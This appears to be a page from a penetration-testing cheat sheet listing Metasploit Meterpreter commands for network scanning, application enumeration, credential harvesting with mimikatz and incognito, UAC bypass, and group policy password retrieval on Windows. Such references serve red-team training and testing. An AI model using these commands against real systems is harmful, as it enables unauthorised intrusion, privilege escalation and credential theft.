Metasploit

Meterpreter

Arp Scan

run arp_scanner -r <iP>/24

Nmap

db_nmap -sS -A <IP>

PortScan

run auxiliary/scanner/portscan/tcp

Application Info

run post/windows/gather/enum_applications

Credential Gathering

run post/windows/gather/credentials/credential_collector

load mimikatz
wdigest

load incognito 
list_tokens -u

Windows

# Collect a load of info 
run winenum

# Show privs
run post/windows/gather/win_privs

# Run as 
use exploit/windows/local/run_as

# Bypass UAC
use exploit/windows/local/bypassuac_injection

# Enumeration ADSI
load extapi
help extapi 

adsi_computer_enum domainname 

# GPP 
use post/windows/gather/credentials/gpp

PreviousCobalt Strike NextSliver

Last updated 3 months ago

Was this helpful?